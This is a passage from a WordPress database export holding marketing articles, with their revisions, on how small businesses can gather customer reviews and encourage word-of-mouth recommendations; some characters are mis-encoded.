their frustrations if theyve had an unhappy experience with you. Plus you can have a space to add an email address.</li>\r\n</ul>\r\nIf you have a website (and you should)\r\n<ul>\r\n <li>Have a sign-up form in a prominent place on every page of the site. Only ask for the name and email address so you dont scare people away.</li>\r\n <li>Add your sign-up form to your social media profiles, then post something about the great emails you send once a week to encourage people to sign up. Give a good reason for people to sign up: tell them theyll receive news about discounts or events, new menus or advance notice of sales.</li>\r\n</ul>\r\nOnce you have these valuable addresses, dont abuse them. Send your customers a simple email a day or two after their product is due to arrive (youll need to be sure of your delivery dates as you dont want to send it before the product gets there); or one or two days after youve provided a service for them.\r\n<div class=\"block\"></div>\r\n \r\n<h2>Pick up the Phone</h2>\r\nI had a phone call recently from a plumbing company Id used a couple of days previously. They were following up to check that everything had gone well, and they asked me if I wouldnt mind leaving a review for them online?\r\n\r\nI happily did so because theyd done a great job and I had been more than pleased with their service. In fact the phone call might well have been more effective than an email because I receive so many of the little critters they tend to get lost.\r\n\r\nMake that call and you may well be rewarded with a loyal customer (Ive used them again since partly because of the good job they did and partly because of the follow-up).\r\n<h2>Slow and steady does it</h2>\r\nDont have a mass mailing. If you manage to gain 500 reviews in a week, the review sites and search engines will be suspicious and you could find that all your reviews are wiped by Google, as reported in this Moz article. Yelp is another site where reviews tend to disappear.\r\n<h2>Engage your customers</h2>\r\nSimply by making your companys presence known youll attract reviews, so have a presence on social media and you have a chance of getting some. 40% of personal travelers and 46% of business travelers leave reviews on social media sites, according to Google Insights.\r\n\r\nYoung people are especially good at leaving feedback online and over half of millennials (Generation Y) actually trust the opinions of strangers over those of their friends and family, so it makes sense to engage this section of population (not to the detriment of your older customers, of course).','Get More Customer Reviews','','publish','closed','closed','','get-customer-reviews','','','2017-10-26 08:18:32','2017-10-26 08:18:32','',0,'http://www.dogstardesign.co.uk/?page_id=16',0,'page','',0),(17,1,'2017-10-26 08:18:19','2017-10-26 08:18:19','<h2>Why do I need reviews?</h2>\r\nThe benefits of receiving online feedback are undeniable. Theyll:\r\n<ul>\r\n <li>Move you up the local search rankings in Google</li>\r\n <li>Give you a free advertising platform</li>\r\n <li>Provide you with ideas on how to improve your business</li>\r\n <li>Let you get to know your customers</li>\r\n</ul>\r\nTheyre not always the easiest things in the world to get, but theyre worth the perseverance.\r\n<h2>Review statistics</h2>\r\nWe live in a world where 72% of customers trust online reviews as much as personal recommendations and where 70% of people trust a review with a minimum of 6-10 reviews\r\n\r\nConsumer reviews are trusted 12 times as much as manufacturers own reviews, according to a survey by video review site EXPO.\r\n\r\nOur interest in reading reviews is increasing too. In 2010 58% of consumers read between 2-10 reviews: by 2012 this number had increased to 65%.\r\n<h2>How many reviews to get ranked?</h2>\r\nDavid Mihm, whos a local search expert, estimates that reviews make up 25% of Googles ranking factors, and he believes that you need at least 10 Google+ and 10 others to get you started. Research from another experienced local search consultant, Phil Rozek back in 2011 showed that 26 is a good number, and to get ranked higher in the SERPs (search engine ranking pages), youll need around one and a half times your local competitors reviews to rank higher than them (on average).\r\n\r\nThis article looks into why people leave reviews and how to get them. Read on\r\n<h2><b>Why do people leave reviews?</b></h2>\r\n<b>Altruism</b>\r\n\r\n<img class=\"size-full wp-image-814 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/226418-bizzare-animal-friendships.jpg\" alt=\"226418-bizzare-animal-friendships\" width=\"880\" height=\"473\" />\r\n\r\nAltruism or perhaps even enlightened self-interest. Reasons customers might want to leave a good review are:\r\n<ul>\r\n <li>To do good by a company thats provided a good experience.</li>\r\n <li>To help out an independent business in their local area.</li>\r\n <li>To be a good member of the online community.</li>\r\n <li>To tell readers what they would want to know themselves.</li>\r\n</ul>\r\nTherefore, ask for their help and appeal to their altruistic side. Tell them you value their feedback (because you do) and its important to you and your customers (because it is). And remember to say thanks!\r\n\r\n<b>Expectation of a reward</b>\r\n\r\nBe careful: some sites dont take kindly to providing incentives customers to give them a review as they will tend to be positive reviews. However, running a competition (see below) can increase the number of reviews you receive, and you could offer a discount on a future purchase or a heads-up on a sale in return for a review, if done carefully by email.\r\n\r\nNever, ever solicit <i>positive</i> reviews, however, as it only makes you look untrustworthy and it will quite possibly get you into trouble with Google, review sites, or even cause yourself a PR headache if someone talks about your actions online.\r\n\r\n<b>Influencing</b>\r\n\r\nSome people like the idea of being able to influence future improvements to a product or service. Be sure to prove to customers that their views will be taken on board by listening to them and importantly, engaging with them. Include these people in focus groups and use their testimonials as part of the marketing for your new product.\r\n\r\n<b>To complain</b>\r\n\r\n<img class=\"size-full wp-image-817 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/grrr.jpg\" alt=\"grrr\" width=\"880\" height=\"290\" />\r\n\r\nYou will inevitably have the odd dissatisfied customer, so youll need to give them an outlet for their unhappiness to prevent it getting to review stage, if at all possible. An email address, for example, or a phone number so that they can get in touch with you directly rather than make their grumbles public. Making it a rule to contact unhappy customers may even result in a negative review being amended, as well as possible future sales.\r\n\r\nBear in mind that a 2011 survey by <a href=\"http://www.conecomm.com/2011coneonlineinfluencetrendtracker\">Cone</a> found that 80% of correspondents declined to buy a product after they had read a negative review of it. Cheeringly, the same survey found that 87% of correspondents bought a product because they had read positive reviews.\r\n\r\nIt therefore makes sense to minimise the number of negative reviews by providing excellent customer service, great products and a great after-sales service, plus dealing with customer complaints before theyre forced to make it public, if at all possible. And lots of positive reviews will outweigh the importance of negative ones, which leads us on to\r\n<h2>Positive v Negative Reviews</h2>\r\nFor those who have cringed at the thought of having their restaurant or hotel pulled apart on TripAdvisor, there is hope: a huge number, 90 million reviews from 65 review sites, were analysed by ReviewPro to discover the percentage of reviews that were grumbles, glowing, or just meh. The results are interesting and show that people dont turn to a review site simply to communicate their dissatisfaction:\r\n\r\n<img class=\"alignnone size-full wp-image-837\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/reviews1.png\" alt=\"reviews\" width=\"880\" height=\"355\" />\r\n\r\n<strong>В Positive</strong> 60%, <strong>Neutral </strong>28%, <strong>Negative</strong>“ 12%\r\n\r\n<a href=\"http://www.tnooz.com/2011/07/15/news/over-90-million-travel-reviews-tested-60-percent-found-to-be-positive\">ReviewPro said</a>:В The need to monitor the social web for damaging content remains, but ReviewPros research proves <b>most people go online to share positive experiences</b>.\r\n\r\nSo, to attract real reviews that people and algorithms are going to approve of, concentrate on improving your services to attract positive real ones, rather than clearing out the bad ones or faking them altogether even if you know others are doing it.\r\n<h2>Respond to reviews</h2>\r\nResponding gives you the opportunity to thank positive reviewers, be seen to care about what your customers are saying about you, and it shows that youre willing to listen to and try to deal with customers issues.\r\n\r\nTake a deep breath and reply diplomatically even if you think the review is unfair: it may well reap rewards and other people will be encourage to review you positively as well.\r\n<h2>Reward Loyalty</h2>\r\nContact your loyal customers to thank them for their reviews. Paying attention to your faithful taskforce will mean that theyll be better inclined to review other products for you. Try offering a reviewer of the month prize draw and you might encourage them to review you on further sites or give you more product reviews.\r\n\r\n \r\n\r\n<b>Google+</b>\r\n\r\nUsers cant leave reviews on Google+ anonymously: they have to specifically have a Google+ account. This adds an element of trustworthiness to the reviews but isnt a quick and easy way for non-Google+ account holders to leave a review.\r\n\r\nUnfortunately, these reviews are worth getting as you saw at the beginning of this article, so find out how visitors found you, and if it was on Google+ Local, ask them nicely.\r\n<h2>Email</h2>\r\n<img class=\"alignnone size-full wp-image-833\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/beg.jpg\" alt=\"beg\" width=\"880\" height=\"355\" />\r\n\r\nYoull need your prospective reviewers email addresses if you want to ask for their reviews by email.\r\n\r\nIts not terribly easy for bricks and mortar shops to get customers addresses in the first place, but there are ways and means:\r\n<ul>\r\n <li>Leave a form beside the till that asks your customer to Sign up for our email list. Make sure you let them know that its confidential and that you wont sell on their email addresses.</li>\r\n <li>Offer a small incentive: Hotel Chocolat give their customers a small bar of chocolates if they leave their addresses. Or enter them into a draw for a prize.</li>\r\n <li>Have a fishbowl on the counter that they can put their business cards into.</li>\r\n <li>Provide a comment card with the bill or keep them beside the cash registers. As well as collating very useful customer feedback and testimonials, its an outlet for customers to vent their frustrations if theyve had an unhappy experience with you. Plus you can have a space to add an email address.</li>\r\n</ul>\r\nIf you have a website (and you should)\r\n<ul>\r\n <li>Have a sign-up form in a prominent place on every page of the site. Only ask for the name and email address so you dont scare people away.</li>\r\n <li>Add your sign-up form to your social media profiles, then post something about the great emails you send once a week to encourage people to sign up. Give a good reason for people to sign up: tell them theyll receive news about discounts or events, new menus or advance notice of sales.</li>\r\n</ul>\r\nOnce you have these valuable addresses, dont abuse them. Send your customers a simple email a day or two after their product is due to arrive (youll need to be sure of your delivery dates as you dont want to send it before the product gets there); or one or two days after youve provided a service for them.\r\n<div class=\"block\"></div>\r\n \r\n<h2>Pick up the Phone</h2>\r\nI had a phone call recently from a plumbing company Id used a couple of days previously. They were following up to check that everything had gone well, and they asked me if I wouldnt mind leaving a review for them online?\r\n\r\nI happily did so because theyd done a great job and I had been more than pleased with their service. In fact the phone call might well have been more effective than an email because I receive so many of the little critters they tend to get lost.\r\n\r\nMake that call and you may well be rewarded with a loyal customer (Ive used them again since partly because of the good job they did and partly because of the follow-up).\r\n<h2>Slow and steady does it</h2>\r\nDont have a mass mailing. If you manage to gain 500 reviews in a week, the review sites and search engines will be suspicious and you could find that all your reviews are wiped by Google, as reported in this Moz article. Yelp is another site where reviews tend to disappear.\r\n<h2>Engage your customers</h2>\r\nSimply by making your companys presence known youll attract reviews, so have a presence on social media and you have a chance of getting some. 40% of personal travelers and 46% of business travelers leave reviews on social media sites, according to Google Insights.\r\n\r\nYoung people are especially good at leaving feedback online and over half of millennials (Generation Y) actually trust the opinions of strangers over those of their friends and family, so it makes sense to engage this section of population (not to the detriment of your older customers, of course).','Get Customer Reviews','','inherit','closed','closed','','16-revision-v1','','','2017-10-26 08:18:19','2017-10-26 08:18:19','',16,'http://www.dogstardesign.co.uk/16-revision-v1',0,'revision','',0),(18,1,'2017-10-26 08:18:32','2017-10-26 08:18:32','<h2>Why do I need reviews?</h2>\r\nThe benefits of receiving online feedback are undeniable. Theyll:\r\n<ul>\r\n <li>Move you up the local search rankings in Google</li>\r\n <li>Give you a free advertising platform</li>\r\n <li>Provide you with ideas on how to improve your business</li>\r\n <li>Let you get to know your customers</li>\r\n</ul>\r\nTheyre not always the easiest things in the world to get, but theyre worth the perseverance.\r\n<h2>Review statistics</h2>\r\nWe live in a world where 72% of customers trust online reviews as much as personal recommendations and where 70% of people trust a review with a minimum of 6-10 reviews\r\n\r\nConsumer reviews are trusted 12 times as much as manufacturers own reviews, according to a survey by video review site EXPO.\r\n\r\nOur interest in reading reviews is increasing too. In 2010 58% of consumers read between 2-10 reviews: by 2012 this number had increased to 65%.\r\n<h2>How many reviews to get ranked?</h2>\r\nDavid Mihm, whos a local search expert, estimates that reviews make up 25% of Googles ranking factors, and he believes that you need at least 10 Google+ and 10 others to get you started. Research from another experienced local search consultant, Phil Rozek back in 2011 showed that 26 is a good number, and to get ranked higher in the SERPs (search engine ranking pages), youll need around one and a half times your local competitors reviews to rank higher than them (on average).\r\n\r\nThis article looks into why people leave reviews and how to get them. Read on\r\n<h2><b>Why do people leave reviews?</b></h2>\r\n<b>Altruism</b>\r\n\r\n<img class=\"size-full wp-image-814 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/226418-bizzare-animal-friendships.jpg\" alt=\"226418-bizzare-animal-friendships\" width=\"880\" height=\"473\" />\r\n\r\nAltruism or perhaps even enlightened self-interest. Reasons customers might want to leave a good review are:\r\n<ul>\r\n <li>To do good by a company thats provided a good experience.</li>\r\n <li>To help out an independent business in their local area.</li>\r\n <li>To be a good member of the online community.</li>\r\n <li>To tell readers what they would want to know themselves.</li>\r\n</ul>\r\nTherefore, ask for their help and appeal to their altruistic side. Tell them you value their feedback (because you do) and its important to you and your customers (because it is). And remember to say thanks!\r\n\r\n<b>Expectation of a reward</b>\r\n\r\nBe careful: some sites dont take kindly to providing incentives customers to give them a review as they will tend to be positive reviews. However, running a competition (see below) can increase the number of reviews you receive, and you could offer a discount on a future purchase or a heads-up on a sale in return for a review, if done carefully by email.\r\n\r\nNever, ever solicit <i>positive</i> reviews, however, as it only makes you look untrustworthy and it will quite possibly get you into trouble with Google, review sites, or even cause yourself a PR headache if someone talks about your actions online.\r\n\r\n<b>Influencing</b>\r\n\r\nSome people like the idea of being able to influence future improvements to a product or service. Be sure to prove to customers that their views will be taken on board by listening to them and importantly, engaging with them. Include these people in focus groups and use their testimonials as part of the marketing for your new product.\r\n\r\n<b>To complain</b>\r\n\r\n<img class=\"size-full wp-image-817 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/grrr.jpg\" alt=\"grrr\" width=\"880\" height=\"290\" />\r\n\r\nYou will inevitably have the odd dissatisfied customer, so youll need to give them an outlet for their unhappiness to prevent it getting to review stage, if at all possible. An email address, for example, or a phone number so that they can get in touch with you directly rather than make their grumbles public. Making it a rule to contact unhappy customers may even result in a negative review being amended, as well as possible future sales.\r\n\r\nBear in mind that a 2011 survey by <a href=\"http://www.conecomm.com/2011coneonlineinfluencetrendtracker\">Cone</a> found that 80% of correspondents declined to buy a product after they had read a negative review of it. Cheeringly, the same survey found that 87% of correspondents bought a product because they had read positive reviews.\r\n\r\nIt therefore makes sense to minimise the number of negative reviews by providing excellent customer service, great products and a great after-sales service, plus dealing with customer complaints before theyre forced to make it public, if at all possible. And lots of positive reviews will outweigh the importance of negative ones, which leads us on to\r\n<h2>Positive v Negative Reviews</h2>\r\nFor those who have cringed at the thought of having their restaurant or hotel pulled apart on TripAdvisor, there is hope: a huge number, 90 million reviews from 65 review sites, were analysed by ReviewPro to discover the percentage of reviews that were grumbles, glowing, or just meh. The results are interesting and show that people dont turn to a review site simply to communicate their dissatisfaction:\r\n\r\n<img class=\"alignnone size-full wp-image-837\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/reviews1.png\" alt=\"reviews\" width=\"880\" height=\"355\" />\r\n\r\n<strong>В Positive</strong> 60%, <strong>Neutral </strong>28%, <strong>Negative</strong>“ 12%\r\n\r\n<a href=\"http://www.tnooz.com/2011/07/15/news/over-90-million-travel-reviews-tested-60-percent-found-to-be-positive\">ReviewPro said</a>:В The need to monitor the social web for damaging content remains, but ReviewPros research proves <b>most people go online to share positive experiences</b>.\r\n\r\nSo, to attract real reviews that people and algorithms are going to approve of, concentrate on improving your services to attract positive real ones, rather than clearing out the bad ones or faking them altogether even if you know others are doing it.\r\n<h2>Respond to reviews</h2>\r\nResponding gives you the opportunity to thank positive reviewers, be seen to care about what your customers are saying about you, and it shows that youre willing to listen to and try to deal with customers issues.\r\n\r\nTake a deep breath and reply diplomatically even if you think the review is unfair: it may well reap rewards and other people will be encourage to review you positively as well.\r\n<h2>Reward Loyalty</h2>\r\nContact your loyal customers to thank them for their reviews. Paying attention to your faithful taskforce will mean that theyll be better inclined to review other products for you. Try offering a reviewer of the month prize draw and you might encourage them to review you on further sites or give you more product reviews.\r\n\r\n \r\n\r\n<b>Google+</b>\r\n\r\nUsers cant leave reviews on Google+ anonymously: they have to specifically have a Google+ account. This adds an element of trustworthiness to the reviews but isnt a quick and easy way for non-Google+ account holders to leave a review.\r\n\r\nUnfortunately, these reviews are worth getting as you saw at the beginning of this article, so find out how visitors found you, and if it was on Google+ Local, ask them nicely.\r\n<h2>Email</h2>\r\n<img class=\"alignnone size-full wp-image-833\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/beg.jpg\" alt=\"beg\" width=\"880\" height=\"355\" />\r\n\r\nYoull need your prospective reviewers email addresses if you want to ask for their reviews by email.\r\n\r\nIts not terribly easy for bricks and mortar shops to get customers addresses in the first place, but there are ways and means:\r\n<ul>\r\n <li>Leave a form beside the till that asks your customer to Sign up for our email list. Make sure you let them know that its confidential and that you wont sell on their email addresses.</li>\r\n <li>Offer a small incentive: Hotel Chocolat give their customers a small bar of chocolates if they leave their addresses. Or enter them into a draw for a prize.</li>\r\n <li>Have a fishbowl on the counter that they can put their business cards into.</li>\r\n <li>Provide a comment card with the bill or keep them beside the cash registers. As well as collating very useful customer feedback and testimonials, its an outlet for customers to vent their frustrations if theyve had an unhappy experience with you. Plus you can have a space to add an email address.</li>\r\n</ul>\r\nIf you have a website (and you should)\r\n<ul>\r\n <li>Have a sign-up form in a prominent place on every page of the site. Only ask for the name and email address so you dont scare people away.</li>\r\n <li>Add your sign-up form to your social media profiles, then post something about the great emails you send once a week to encourage people to sign up. Give a good reason for people to sign up: tell them theyll receive news about discounts or events, new menus or advance notice of sales.</li>\r\n</ul>\r\nOnce you have these valuable addresses, dont abuse them. Send your customers a simple email a day or two after their product is due to arrive (youll need to be sure of your delivery dates as you dont want to send it before the product gets there); or one or two days after youve provided a service for them.\r\n<div class=\"block\"></div>\r\n \r\n<h2>Pick up the Phone</h2>\r\nI had a phone call recently from a plumbing company Id used a couple of days previously. They were following up to check that everything had gone well, and they asked me if I wouldnt mind leaving a review for them online?\r\n\r\nI happily did so because theyd done a great job and I had been more than pleased with their service. In fact the phone call might well have been more effective than an email because I receive so many of the little critters they tend to get lost.\r\n\r\nMake that call and you may well be rewarded with a loyal customer (Ive used them again since partly because of the good job they did and partly because of the follow-up).\r\n<h2>Slow and steady does it</h2>\r\nDont have a mass mailing. If you manage to gain 500 reviews in a week, the review sites and search engines will be suspicious and you could find that all your reviews are wiped by Google, as reported in this Moz article. Yelp is another site where reviews tend to disappear.\r\n<h2>Engage your customers</h2>\r\nSimply by making your companys presence known youll attract reviews, so have a presence on social media and you have a chance of getting some. 40% of personal travelers and 46% of business travelers leave reviews on social media sites, according to Google Insights.\r\n\r\nYoung people are especially good at leaving feedback online and over half of millennials (Generation Y) actually trust the opinions of strangers over those of their friends and family, so it makes sense to engage this section of population (not to the detriment of your older customers, of course).','Get More Customer Reviews','','inherit','closed','closed','','16-revision-v1','','','2017-10-26 08:18:32','2017-10-26 08:18:32','',16,'http://www.dogstardesign.co.uk/16-revision-v1',0,'revision','',0),(19,1,'2017-10-26 08:22:40','2017-10-26 08:22:40',' \r\n\r\nIf you heard about a marketing idea that could bring you more leads and sales, would you be interested in learning more about it? What about an old one that you dont pay much attention to any more but that you probably use to some extent without thinking about it? What about word of mouth marketing?\r\n<h2>What exactly is Word of Mouth Marketing?</h2>\r\n<a href=\"http://www.entrepreneur.com/encyclopedia/word-of-mouth-advertising\">Entrepreneur.com</a> describes word of mouth marketing (WOM or WOMM) as being An unpaid form of promotion in which satisfied customers tell other people how much they like a business, product or service. <a href=\"http://www.wommapedia.org/\">Wommapedia.org</a> says its harnessing the power of people to build brand awareness.\r\n\r\nMarketing concepts like buzz marketing, influencer marketing, viral marketing and social media marketing all comes under the banner of WOM but what theyre talking about basically all boils down to the same thing: getting customers to talk about you and tell others about your product.\r\n\r\n \r\n<h3>The History of WOM</h3>\r\nIts been around as a marketing concept since the 1970s when a psychologist (George Silverman) noticed that a One or two physicians who were having good experiences with a drug would sway an entire group of skeptics. They would even sway a dissatisfied group of ex-prescribers who had had negative experiences!\r\n<h3>Why is WOM important?</h3>\r\n \r\n\r\nThere are a few reasons why word of mouth is as important as ever, despite our reliance on the web:\r\n<ul>\r\n <li>The traditional media newspapers, magazines, TV arent as effective as they used to be. As we all know, fewer of us are consuming them (Im as guilty as the next person), and we ignore banner ads online.</li>\r\n <li>Intrusive marketing like direct mail, flyers and cold calling isnt effective because weve become immune to it now and see it as an annoyance.</li>\r\n <li>The internet means there could be hundreds of companies out there doing the same thing you are, so you have to have a way of being found and standing out. People talking about you will give you at least some of the visibility you need.</li>\r\n</ul>\r\n<h3>The Stats</h3>\r\na person with 300 friends on Facebook may happily ignore the advice of 290 of them. Its the small, close-knit network of trusted friends that has the real influence.\r\n\r\n \r\n\r\nProviders of local SEO tools, BrightLocal, found in a 2012 survey of consumers that\r\n\r\n77% of people have recommended a local business to someone they know via WOM.\r\n\r\n36% of company owners rate word of mouth as best for their business.\r\n\r\nAll they need to do is know how to harness that willingness to recommend for their own business. Easy, eh?\r\n\r\nThe importance of social media in spreading the word is important (especially Facebook), but still, conversations about brands are largely done offline В 90% of them, according to the authors of Face-t0-Face (and 75%, according to the Keller Fay Group).\r\n<h2>Encouraging word of mouth conversations</h2>\r\nHowever, with moreВ of us than ever before getting our news online, and conversation topics being generated there, well need to split our efforts between online and offline.\r\n\r\nIn this article Ill suggest some methods and provide real-life examples on how local businesses can encourage word of mouth conversations.\r\n<h2>Local Influencers</h2>\r\nBear in mind that your Facebook and Twitter fans arent the only ones you need to be targeting WOM campaigns with.\r\n\r\nOnly 1% of social media users create over half of the conversations, and those influencers spreading the word about your company will be a much quicker and more effective way of spreading the word. As well as helping to bring in new customers, theyll help to keep your brand in the minds of those who have already clicked your Like button but havent been back to your Facebook page since.\r\n\r\nAnother benefit of targeting influencers is that it doesnt devour too much in the way of resources: a survey by Technorati found that only 6% of companies marketing budgets were used up by it.\r\n\r\nIdeally, you should be looking for global influencers in your niche as well as local influencers. Links from those top influencers can result it great quality links. However, in terms of word of marketing for local businesses, Ill look at finding local influencers.\r\n\r\n \r\n<h3>Google</h3>\r\n \r\n\r\nTheres been a phenomenal rise in local bloggers in recent years who focus mainly on their local area. Get in touch with them they can do marvels for your business because they attend local events where theyll be able to mention your company if youve impressed them. And of course, locals in the area will be looking for information on their local area online.\r\n\r\nNow Ive made a search on Google for bloggers Manchester and the third result that popped up was “The Manchizzle blog by Kate Feld, tagline “The pick of Manchester culture and hub of blogging goodness.\r\n\r\nIts a great blog, but whats really interesting is a fantastic blogroll (list) of Manchester and North West England-based city and neighbourhood blogs, foodie blogs, and culture, fashion and design blogs down the side. Heres a selection:\r\n\r\n \r\n\r\nAmong these may very well be a blogger who wants to talk about your business or review you.\r\n<h2>How to engage with local influencers when you find them</h2>\r\n<ul>\r\n <li>Retweet their content with a useful comment</li>\r\n <li>Email them</li>\r\n <li>Engage them in conversation on Twitter and Facebook</li>\r\n <li>Ask them questions (not by direct messaging them)</li>\r\n <li>Offer them a free product or service to review</li>\r\n <li>And if youve referred to their content in a blog post, dont be shy: let them know.</li>\r\n</ul>\r\nKeep a track of the conversations youre having with a tool like <a href=\"http://www.nimble.com/\">Nimble</a> or youll forget you who youve already contacted.\r\n<h2>Deviate from the Expected</h2>\r\nConversations about brands or products begin when the experience of a purchased product deviates from the expected whether that be in a positive or negative way. Think about how youve reacted to something thats exceeded your expectations or disappointed you.\r\n\r\nYou may well have mentioned it to someone else. This could be to do with the product or, an advert or with a matter of customer support. Here are some examples of how companies have exceeded expectations:\r\n<h2>Delivery, Packaging and Freebies</h2>\r\nEtsy sellers have it down pat when it comes to going the extra mile. They need to because theyre in an extremely competitive market.\r\n\r\nA personal example: Christmas 2012 I ordered a tie as a present and it came beautifully wrapped in a little crisp cellophane parcel tied with a ribbon (it was a beautiful tie, too). Ive told four people about that company and Ive bookmarked them for my next tie purchases (I know someone whos very fond of quirky ties).\r\n\r\nAs well as great packaging, Kelly provides free swatches, fantastic quality and fast delivery. Ill bet these happy customers have mentioned her to someone else:\r\n\r\n“The ties were everything and more of what I had hoped for. Great Quality! You went above and beyond with the pocket squares. THANK YOU SO MUCH!!!! I would refer you to anyone!!! Great service and fast delivery!!!\r\n\r\nHeres feedback for another seller, <a href=\"http://www.etsy.com/uk/shop/RootsAndWingsJewelry\">RootsAndWingsJewelry</a>\r\n\r\n“Item received in a timely manner. packaging was fun and Eco-friendly, which I appreciate very much! “\r\n\r\nAnd another, <a href=\"http://www.etsy.com/uk/people/micasita?ref=pr_profile\">Micasita</a>:\r\n\r\n“Excellent pouch, fabric, sewing everything! And it came with stickers as a an Easter present.\r\n\r\nHow have these sellers deviated from the expected?\r\n<ul>\r\n <li>Fast delivery, a free sample or little extra present and great packaging are all ways to add quality, make you memorable and drive conversations. Dont promise fast delivery if it doesnt normally happen, though.</li>\r\n <li>Bricks and mortar shops, use handouts and takeaways sweets, pens or even fridge magnets something to remind your customer to mention your company when they take the item out of their pocket at home.</li>\r\n <li>Online companies like web designers and B2B, provide graphics with your logo, name and/or email address prominently displayed.</li>\r\n</ul>\r\n \r\n<h2>Conversation Triggers</h2>\r\nConversation triggers are small items that get a conversation started when other people see them. Heres an example from <a href=\"http://www.wordofmouth.org/\">WordofMouth.org</a>:\r\n\r\n“Ive taken every business card that Ive received in the past ten years, glued my logo to the back, used a laminator to turn it into a luggage tag, and mailed it back to the person I just met. Ill bet that at least 5,000 people have my logo on their briefcase or suitcase. When they meet each other, they talk about my company. Thats a lot of word of mouth.\r\n\r\nIngenious, isnt it?\r\n<h2>Buzz Marketing</h2>\r\nMark Hughes, author of <a href=\"http://buzzmarketing.com/2010/11/26/push-the-six-buttons-of-buzz-to-start-a-conversation/\">Buzz Marketing</a> says that the public will talk about you (offline and online) if you use some of the following in your campaigns:\r\n<ul>\r\n <li>The Unusual</li>\r\n <li>The Remarkable</li>\r\n <li>The Outrageous</li>\r\n <li>The Taboo</li>\r\n <li>The Hilarious</li>\r\n</ul>','What is Word of Mouth Marketing?','','publish','closed','closed','','what-is-word-of-mouth-marketing','','','2017-10-26 08:22:59','2017-10-26 08:22:59','',0,'http://www.dogstardesign.co.uk/?page_id=19',0,'page','',0),(20,1,'2017-10-26 08:22:40','2017-10-26 08:22:40','<img class=\"aligncenter size-full wp-image-1150\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/07/word-of-mouth.png\" alt=\"word-of-mouth\" width=\"880\" height=\"300\" />\r\n\r\nIf you heard about a marketing idea that could bring you more leads and sales, would you be interested in learning more about it? What about an old one that you dont pay much attention to any more but that you probably use to some extent without thinking about it? What about word of mouth marketing?\r\n<h2>What exactly is Word of Mouth Marketing?</h2>\r\n<a href=\"http://www.entrepreneur.com/encyclopedia/word-of-mouth-advertising\">Entrepreneur.com</a> describes word of mouth marketing (WOM or WOMM) as being An unpaid form of promotion in which satisfied customers tell other people how much they like a business, product or service. <a href=\"http://www.wommapedia.org/\">Wommapedia.org</a> says its harnessing the power of people to build brand awareness.\r\n\r\nMarketing concepts like buzz marketing, influencer marketing, viral marketing and social media marketing all comes under the banner of WOM but what theyre talking about basically all boils down to the same thing: getting customers to talk about you and tell others about your product.\r\n\r\n \r\n<h3>The History of WOM</h3>\r\nIts been around as a marketing concept since the 1970s when a psychologist (George Silverman) noticed that a One or two physicians who were having good experiences with a drug would sway an entire group of skeptics. They would even sway a dissatisfied group of ex-prescribers who had had negative experiences!\r\n<h3>Why is WOM important?</h3>\r\n<img class=\"size-full wp-image-1124 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/07/womm-pizza-vouchers.jpg\" alt=\"Only Pizza Vouchers\" width=\"576\" height=\"768\" />\r\n\r\nThere are a few reasons why word of mouth is as important as ever, despite our reliance on the web:\r\n<ul>\r\n <li>The traditional media newspapers, magazines, TV arent as effective as they used to be. As we all know, fewer of us are consuming them (Im as guilty as the next person), and we ignore banner ads online.</li>\r\n <li>Intrusive marketing like direct mail, flyers and cold calling isnt effective because weve become immune to it now and see it as an annoyance.</li>\r\n <li>The internet means there could be hundreds of companies out there doing the same thing you are, so you have to have a way of being found and standing out. People talking about you will give you at least some of the visibility you need.</li>\r\n</ul>\r\n<h3>The Stats</h3>\r\na person with 300 friends on Facebook may happily ignore the advice of 290 of them. Its the small, close-knit network of trusted friends that has the real influence.\r\n\r\n<img class=\"size-full wp-image-1129 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/07/womm-through-friends.jpg\" alt=\"Marketing through friends\" width=\"470\" height=\"375\" />\r\n\r\nProviders of local SEO tools, BrightLocal, found in a 2012 survey of consumers that\r\n\r\n77% of people have recommended a local business to someone they know via WOM.\r\n\r\n36% of company owners rate word of mouth as best for their business.\r\n\r\nAll they need to do is know how to harness that willingness to recommend for their own business. Easy, eh?\r\n\r\nThe importance of social media in spreading the word is important (especially Facebook), but still, conversations about brands are largely done offline В 90% of them, according to the authors of Face-t0-Face (and 75%, according to the Keller Fay Group).\r\n<h2>Encouraging word of mouth conversations</h2>\r\nHowever, with moreВ of us than ever before getting our news online, and conversation topics being generated there, well need to split our efforts between online and offline.\r\n\r\nIn this article Ill suggest some methods and provide real-life examples on how local businesses can encourage word of mouth conversations.\r\n<h2>Local Influencers</h2>\r\nBear in mind that your Facebook and Twitter fans arent the only ones you need to be targeting WOM campaigns with.\r\n\r\nOnly 1% of social media users create over half of the conversations, and those influencers spreading the word about your company will be a much quicker and more effective way of spreading the word. As well as helping to bring in new customers, theyll help to keep your brand in the minds of those who have already clicked your Like button but havent been back to your Facebook page since.\r\n\r\nAnother benefit of targeting influencers is that it doesnt devour too much in the way of resources: a survey by Technorati found that only 6% of companies marketing budgets were used up by it.\r\n\r\nIdeally, you should be looking for global influencers in your niche as well as local influencers. Links from those top influencers can result it great quality links. However, in terms of word of marketing for local businesses, Ill look at finding local influencers.\r\n\r\n \r\n<h3>Google</h3>\r\n<img class=\"size-full wp-image-1132 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/07/manchizzle.jpg\" alt=\"Manchizzle\" width=\"660\" height=\"216\" />\r\n\r\nTheres been a phenomenal rise in local bloggers in recent years who focus mainly on their local area. Get in touch with them they can do marvels for your business because they attend 